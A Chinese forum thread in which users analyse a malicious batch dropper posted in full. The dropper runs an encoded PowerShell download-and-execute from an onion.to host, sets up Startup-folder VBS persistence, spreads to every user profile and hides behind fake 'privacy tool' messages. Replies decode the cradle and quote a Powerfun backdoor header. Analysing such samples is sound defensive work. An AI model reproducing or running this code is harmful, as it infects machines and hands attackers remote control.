有人能分析一下这些代码吗？

418634392

@echo off
if %PROCESSOR_ARCHITECTURE%==x86 (
        powershell -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA==)
if %PROCESSOR_ARCHITECTURE%==AMD64 (
        %WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== )


@echo @echo off > "%USERPROFILE%\appdata\file.bat"
@echo if %%PROCESSOR_ARCHITECTURE%%==x86 ( START /B powershell -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== ) >> "%USERPROFILE%\appdata\file.bat"
@echo if %%PROCESSOR_ARCHITECTURE%%==AMD64( START /B %%WinDir%%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== ) >> "%USERPROFILE%\appdata\file.bat"

SET sfpath=AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

SET sfpathall=%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup

echo Dim WinScriptHost > "%USERPROFILE%\%sfpath%\config.vbs"
echo WScript.Sleep(30000) >> "%USERPROFILE%\%sfpath%\config.vbs"
echo Set WinScriptHost = CreateObject("WScript.Shell") >> "%USERPROFILE%\%sfpath%\config.vbs"
echo WinScriptHost.Run Chr(34) ^& "%%USERPROFILE%%\appdata\file.bat" ^& Chr(34)^, 0 >> "%USERPROFILE%\%sfpath%\config.vbs"
echo While True >> "%USERPROFILE%\%sfpath%\config.vbs"
echo        set service = GetObject ("winmgmts:") >> "%USERPROFILE%\%sfpath%\config.vbs"
echo        running = 0 >> "%USERPROFILE%\%sfpath%\config.vbs"
echo        for each Process in Service.InstancesOf ("Win32_Process") >> "%USERPROFILE%\%sfpath%\config.vbs"
echo                If Process.Name = "powershell.exe" then >> "%USERPROFILE%\%sfpath%\config.vbs"
echo                        running = running + 1 >> "%USERPROFILE%\%sfpath%\config.vbs"
echo                        End If >> "%USERPROFILE%\%sfpath%\config.vbs"
echo        next >> "%USERPROFILE%\%sfpath%\config.vbs"
echo        If running ^< 1 then >> "%USERPROFILE%\%sfpath%\config.vbs"
echo                WinScriptHost.Run Chr(34) ^& "%%USERPROFILE%%\appdata\file.bat" ^& Chr(34)^, 0 >> "%USERPROFILE%\%sfpath%\config.vbs"
echo                End If >> "%USERPROFILE%\%sfpath%\config.vbs"
echo        WScript.Sleep(120000) >> "%USERPROFILE%\%sfpath%\config.vbs"
echo Wend >> "%USERPROFILE%\%sfpath%\config.vbs"
echo Set WinScriptHost = Nothing >> "%USERPROFILE%\%sfpath%\config.vbs"

START /B wscript.exe "%USERPROFILE%\%sfpath%\config.vbs"

cd %USERPROFILE%
cd ..
for /d %%f in (*) do (
        START /B cmd.exe copy "%USERPROFILE%\appdata\file.bat" "%%~ff\appdata\file.bat"
        START /B cmd.exe copy "%USERPROFILE%\%sfpath%\config.vbs" "%%~ff\%sfpath%\config.vbs"
        )

START /B cmd.exe copy "%USERPROFILE%\%sfpath%\config.vbs" "%sfpathall%\config.vbs"

echo Wscript.Sleep 3000 > "%userprofile%\appdata\sleep.vbs"
REM cls
REM :A
REM color 0a
REM cls
echo Starting Privacy Tools...
start /w wscript.exe "%userprofile%\appdata\sleep.vbs"
echo:
echo:
echo:
echo Checking for DNS leaks...
start /w wscript.exe "%userprofile%\appdata\sleep.vbs"
echo:
echo:
echo:
echo DNS leaks fixed!
start /w wscript.exe "%userprofile%\appdata\sleep.vbs"
echo:
echo:
echo:
echo:

set /p DUMMY=Hit ENTER to continue...

del "%userprofile%\appdata\sleep.vbs"

随便注册

从https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq下载代码写入file.bat，然后是两个vbs看不懂，还有添加自启动什么的

1. [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
   
2. iex (New-Object Net.WebClient).DownloadString("https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq")

复制代码

打不开了，换了个域名https://lc25qj2gdcaidarc.onion.link/LeTrWHzIq，如果不是巧合
就是一个base64接着一个base64
最终得到一个gzip，里面文件跟乱码似的

1. # Powerfun - Written by Ben Turner & Dave Hardy
   
2. 
   
3. function Get-Webclient
   
4. {
   
5.     $wc = New-Object -TypeName Net.WebClient
   
6.     $wc.UseDefaultCredentials = $true
   
7.     $wc.Proxy.Credentials = $wc.Credentials
   
8.     $wc
   
9. }
   
10. ……
    

复制代码

有个ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com，不知道为什么查是电信的

nazisoft

搞加密字符串的，不是什么好东西

snoshowtime

看不明白，坐等大神解答！

LeonTheCracker

楼主大大，这个是你从lc25qj2gdcaidarc.onion那个暗网网站里搞来CrackBook.bat吧，我也研究这个脚本一些时间了，这是个僵尸网络病毒，管理僵尸网络的那个黑客IP可能被我反跟踪到了，是个印度尼西亚人，185.100.85.150，你可以跟我一起详细研究研究（老号丢了，一个新号）

418634392

LeonTheCracker 发表于 2018-4-7 21:47
楼主大大，这个是你从lc25qj2gdcaidarc.onion那个暗网网站里搞来CrackBook.bat吧，我也研究这个脚本一些时 ...

嘘

cnseatech

加密字符的，应该有不良企图的

wyoven

了解一下

LeonTheCracker

IP是假的，onion.to都是这个IP